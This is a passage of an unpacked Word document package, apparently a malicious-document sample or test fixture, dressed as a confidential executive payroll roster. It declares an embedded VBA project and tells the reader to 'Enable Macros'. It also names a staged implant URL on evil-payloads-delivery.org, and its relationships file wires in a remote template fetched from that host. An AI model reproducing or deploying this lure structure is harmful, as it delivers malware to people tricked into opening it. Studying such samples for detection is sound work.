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bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
  <Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
</Relationships>
</file>

<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>CONFIDENTIAL - TARGET CORPORATION FINANCIAL CONTROLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Q3 Executive Payroll, Bonus Allocations &amp; Domain Access Roster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Target Domain: TARGET.LOCAL | Primary Host: WKSTN-FIN-01 (10.0.4.15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Staged Implant: http://evil-payloads-delivery.org/beacon_updater.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Expected Payload SHA256: fbfd5b9863d0e6acf98c420c3d2e301a830f42e8fee7d94809ea9bffdf755972</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Enable Macros to calculate executive compensation formulas.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://evil-payloads-delivery.org/templates/financial_macro_v2.dotm" TargetMode="External"/>
</Relationship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Q3 Executive Financial Compensation &amp; Bonus Schedule</dc:title>
  <dc:creator>TARGET\svc_admin</dc:creator>
  <cp:lastModifiedBy>jdoe</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-10T09:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-10T10:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>